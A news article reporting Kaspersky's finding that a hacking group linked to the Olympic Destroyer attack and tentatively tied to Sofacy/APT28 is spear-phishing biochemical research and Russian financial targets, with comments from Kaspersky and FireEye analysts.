A wave of sophisticated spear phishing emails captured by Moscow-based Kaspersky Lab suggests that the same Russian-linked hacking group responsible for a historic cyberattack on the 2018 Winter Olympics is now targeting biochemical research and domestic financial organizations.
Dubbed “Sofacy,” “APT28” or “Fancy Bear” by security analysts, the attackers gained notoriety earlier this year when a destructive hacking tool aimed at the IT network attached to the Winter Olympics caught the attention of multiple intelligence agencies. That tool, known as “Olympic Destroyer,” allowed for malware to spread within multiple confined IT environments, quickly deleting boot records and other forensic artifacts while also simultaneously siphoning off sensitive user credentials.
CyberScoop previously reported that Sofacy had hacked into the 2018 Olympic games primary IT provider, Atos, months before the event began.
One related phishing email that uses a booby trapped Microsoft Word document explicitly mentions a biochemical threat research conference held in Switzerland, which is organized by Spiez Laboratory. Kaspersky noticed the lure was being sent around last month. Other phishing emails incorporate fake letterheads associated with a Ukrainian government agency.
The Olympics attacks became known for its use of so-called “false flags,” which injected a combination of technical attributes and techniques typically associated with an entirely different threat group in order to throw off investigators. At the time, Sofacy had been trying to pass off their operations as being carried out by North Korean hackers.
The latest findings by Kaspersky — a company facing its own geopolitical struggles — provides an incomplete but still notable window into Sofacy’s ongoing cyber-espionage efforts. The targeting of biochemical and Russian financial institutions coincides with simmering tensions between the Kremlin and United Kingdom government, who blames Russia for attempting to murder a British citizen and his daughter.
Researchers said they were able to trace back the new phishing emails and prior OlympicDestroyer activity to Sofacy with “low to moderate confidence.”
While the newest, first-stage hacking attempts haven’t proven to be destructive just yet, the use of spearphishing in order to gain access to computers in France, Germany, Switzerland, Russia, and Ukraine has already set off alarm bells. In these cases, the malicious emails carry PowerShell Empire, an open-source penetration testing framework, inside attachments that when clicked will begin to run scripts, calling back to a remote attack server. The retrieved samples so far do not carry a final payload like Olympic Destroyer although they’re associated.
“The variety of financial and non-financial targets could indicate that the same malware was used by several groups with different interests,” Kaspersky’s Global Research & Analysis Team (GReAT) wrote. “This could also be a result of cyberattack outsourcing, which is not uncommon among nation state actors. On the other hand, the financial targets might be another false flag operation by an actor who has already excelled at this during the Pyeongchang Olympics to redirect researchers’ attention.”
This would not be the first time that experts discovered a grey area between Russia’s financial and espionage-focused cyber operations.
Ben Read, a cyber-espionage analyst with cybersecurity firm FireEye, said that his firm has also been tracking the new Sofacy activity.
“We assess that the same actor who sent spear phishing emails to Olympic partners around January ahead of the event is behind these new lures,” Read said. “In the past, we’ve seen APT28 and APT29 [both Russian-linked hacking teams] reuse CNE (computer network exploitation) tools for not just foreign espionage, but domestic security purposes. For example, we saw APT28 target Pussy Riot … That could possibly explain the dual targeting of Russian banks and these other things.”
In a company blog post, Kaspersky said it’s coming forward with the limited but important findings because of the potential that these intrusions could escalate into more damaging incidents; similar to what occurred in South Korea.
“Our research indicates that the group behind the Olympic Destroyer attack is actually a resourceful actor, which continues to be active,” said Costin Raiu, head of GReAT. “Without doubt, the Olympic Destroyer attack from February was carefully planned for months, from the initial access to the moment the wiper malware was deployed …the attacker is very agile and creative, with a focus on operational security while sitting somewhere in the middle when it comes to skills and access to custom tools.”
“We’ve seen the destructive attacks against Aramco and other companies in the Middle East (Shamoon, Shamoon 2), the BlackEnergy attacks against Ukraine’s power grid and the Notpetya attacks, between others, which had a serious impact on businesses worldwide,” Raiu said. “Therefore, evidence of continued activity from an actor which launches destructive attacks is a major reason for concern.”